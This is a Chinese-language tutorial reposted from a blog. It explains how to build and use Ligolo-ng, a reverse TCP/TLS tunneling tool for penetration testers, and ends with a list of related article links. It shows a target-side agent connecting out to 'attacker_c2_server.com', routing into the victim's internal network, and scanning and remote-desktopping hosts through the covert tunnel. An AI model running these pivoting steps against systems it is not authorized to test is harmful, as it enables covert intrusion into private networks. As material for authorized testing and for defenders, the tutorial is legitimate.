使用Ligolo-ng建立隐蔽的通信信道
关于Ligolo-ng
Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。
功能介绍
Tun接口(不再需要SOCKS);
简单的UI界面,支持选择代理和网络信息;
易于使用,易于安装;
基于Let’s Encrypt的自动化证书配置;
高性能(多路复用);
不需要高级权限;
套接字监听/代理绑定;
多平台代理支持;
工具构建
构建Ligolo-ng
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
Build agent for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
安装Ligolo-ng
我们需要在自己的命令控制服务器上开启代理服务,默认使用11601端口监听:
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
工具使用
首先,我们需要在目标设备上启动代理(无需特殊权限):
$ ./agent -connect attacker_c2_server.com:11601
此时,代理服务器上将出现一条会话链接:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote=“XX.XX.XX.XX:38000”
使用“session”命令选择代理:
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
使用“ifconfig”命令显示代理的网络配置信息:
[Agent : nchatelain@nworkstation] » ifconfig
[…]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘
在代理/中继服务器上添加一条指向192.168.0.0/24代理网络的路由:
$ sudo ip route add 192.168.0.0/24 dev ligolo
最后,在代理上开启一条通信信道:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
现在,你就可以通过代理服务器访问192.168.0.0/24代理网络:
$ nmap 192.168.0.0/24 -v -sV -n
[…]
$ rdesktop 192.168.0.123
[…]
支持的协议/数据包
TCP
UDP
ICMP
性能
在Ligolo-ng的帮助下,你可以轻松达到100 Mbits/秒的速度。下面给出的测试结果是在一台200Mbits/s服务器上使用iperf测试的一条200Mbits/s的链接:
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
注意事项
由于代理并不是以高级权限运行的,因此无法转发原始数据包。当你执行“NMAP SYN-SCAN”的时候,代理上会执行一次TCP connect()。
在使用Nmap时,你应该使用“–unprivileged”或“-PE”以避免假阳性。
项目地址
Ligolo-ng:https://github.com/tnpitsecurity/ligolo-ng
使用Ligolo-ng建立隐蔽的通信信道相关推荐
- 【网络安全】无需SOCKS支持,帮助广大渗透测试人员建立一条隐蔽的通信信道
关于Ligolo-ng Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能.Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的 ...
- 【网络安全】ICMP隐蔽隧道通信与检测
ICMP隐蔽隧道通信与检测 技术背景 在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道,DNS隧道,正反向端口转发等)进行操作均失败.那么可以尝试使用ICMP建立隧道,ICMP协议不需要 ...
- (转)API SOCKET基础(一) TCP建立连接并通信
写这篇日志,并不是要记录令人眼前一亮的算法,只是为了本人健忘的脑袋做一点准备. 要进行网络通信编程,就要用到socket(套接字),下面以TCP为例展示如何利用socket通信. 要 进行socket ...
- 无人机通信信道模型实现代码
无人机通信信道模型实现 import numpy as npclass Channel_Param:@propertydef a(self):return self._a@propertydef b( ...
- docker webdav_【技术分享】利用WebDAV特性建立隐蔽后门
译者:Ska 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 前言--隐蔽后门的设计与需求 我最近一直想为Windows系统设计一个隐蔽后门,主要功能是: ...
- ios 跨域_如何在iOS和Android中建立跨域通信桥
ios 跨域 I was working on a certain project at work, in which I needed to connect several varying comp ...
- 常见通信信道仿真模型
最近在做MATLAB仿真,经常遇到信道仿真,常见的两个就是AWGN信道和瑞利衰落信道,做一般的ofdm仿真时会让信号依次经过这两个信道模型产生接收信号. 下面简单聊几句关于这两个信道模型,关于具体说明 ...
- 双IRS辅助毫米波MIMO通信信道估计
一,基础知识 1.共轭转置矩阵 复数向量长度的平方并不是 :对一个复数向量或者矩阵进行转置时,同时对它们取共轭. 我们也要对向量的内积定义进行一下扩展,但内积为零 ...
- 使用cubemx快速建立一个串口通信程序
使用cubemx快速建立一个串口通信工程 序言 建立工程 配置cubemx 添加串口部分代码 添加printf打印代码 添加接收代码 附件--->下载 序言 st官方已经停止更新标准库了,而且新 ...
- oracle通信通道的文件结尾_Oracle错误——ORA-03113:在通信信道文件的末尾 解决方案...
起源 今天跟往常一样,登陆PL/SQL,确登陆失败,出现一个错误"ORA-01034"和"ORA-27101"如图: 然后就就通过命令提示符去登陆Oracle, ...
最新文章
- CentOS 6.5 手动rpm包安装gcc、g++
- 2020年女人体重表,看看你是不是标准的模特体重
- docker-compose bug
- 农林行业的系统应用 php专业,农林|类专业
- 学生电脑哪个牌子好_专卖工作服哪个牌子好
- 小能量汇聚成大能量_清体能量棒配料解析:小种子,大能量,藜麦和青稞
- 黑金花大理石_黑色系大理石的首选——黑金花
- ax在c语言中意思啊,【数论】整理关于ax+by=c
- PHP响应式H5图片网盘外链系统源码 自适应PC手机端
- Ansible(二)——基本环境的部署以及常用模块的使用
- laravel5.4中验证与错误提示设置
- 向量组A可以由一个向量组B表出,并且A的秩小于B的秩,那么A线性相关
- 使用Scapy进行网络扫描
- 找电影最强攻略,最全资源站
- iOS应用商店审核指南
- 宇视项目VM相关笔记
- 【渝粤教育】广东开放大学 插画与漫画 形成性考核 (27)
- f检验matlab计算,F检验(F-Test)计算公式与在线计算器_三贝计算网_23bei.com
- More Effective C++之 Item M26:限制某个类所能产生的对象数量
- 计算机功能键名称,电脑键盘功能基础知识有哪些你知道吗